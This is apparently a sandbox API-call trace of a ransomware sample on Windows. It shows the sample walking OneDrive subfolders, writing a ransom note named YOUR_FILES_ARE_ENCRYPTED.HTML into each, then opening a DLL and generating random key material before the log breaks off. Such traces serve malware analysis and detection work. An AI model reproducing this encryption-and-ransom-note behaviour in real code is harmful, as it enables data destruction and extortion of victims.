pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br") returned 77 [0162.029] GetProcessHeap () returned 0x270000 [0162.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.029] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br" [0162.029] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\*" [0162.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.030] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.030] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.030] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.030] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.030] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.031] lstrlenW (lpString=".mui") returned 4 [0162.031] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.031] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.031] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.031] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.031] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.034] CloseHandle (hObject=0x5b8) returned 1 [0162.034] GetProcessHeap () returned 0x270000 [0162.035] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.035] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0162.035] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt") returned 77 [0162.035] GetProcessHeap () returned 0x270000 [0162.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.035] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt" [0162.035] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\*" [0162.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.036] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.036] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.036] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.036] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.036] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.036] lstrlenW (lpString=".mui") returned 4 [0162.036] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.036] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.036] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.036] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.037] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.039] CloseHandle (hObject=0x5b8) returned 1 [0162.040] GetProcessHeap () returned 0x270000 [0162.041] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.041] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="qut-latn", cAlternateFileName="")) returned 1 [0162.041] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn") returned 80 [0162.041] GetProcessHeap () returned 0x270000 [0162.041] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.041] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn" [0162.041] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\*" [0162.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.041] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.041] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.041] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\FileSync.LocalizedResources.dll.mui") returned 116 [0162.041] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.041] lstrlenW (lpString=".mui") returned 4 [0162.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.042] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.042] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.042] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0162.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\qut-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.042] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.045] CloseHandle (hObject=0x5b8) returned 1 [0162.045] GetProcessHeap () returned 0x270000 [0162.046] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.046] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="quz-pe", cAlternateFileName="")) returned 1 [0162.046] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe") returned 78 [0162.046] GetProcessHeap () returned 0x270000 [0162.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.046] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe" [0162.046] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\*" [0162.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.047] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.047] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.047] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\FileSync.LocalizedResources.dll.mui") returned 114 [0162.047] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.047] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.047] lstrlenW (lpString=".mui") returned 4 [0162.047] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.047] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.047] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.047] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0162.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\quz-pe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.048] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.050] CloseHandle (hObject=0x5b8) returned 1 [0162.051] GetProcessHeap () returned 0x270000 [0162.051] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.051] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa46bf810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa46bf810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa46e5970, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xb9ca8, dwReserved0=0x0, dwReserved1=0x60, cFileName="RemoteAccess.dll", cAlternateFileName="REMOTE~1.DLL")) returned 1 [0162.052] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll") returned 88 [0162.052] lstrcmpW (lpString1="RemoteAccess.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.052] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0162.052] lstrlenW (lpString=".dll") returned 4 [0162.052] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0162.052] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\remoteaccess.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0162.053] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=761000) returned 1 [0162.053] GetProcessHeap () returned 0x270000 [0162.053] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.057] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="56") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="58") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="48") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="2A") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="41") returned 2 [0162.057] 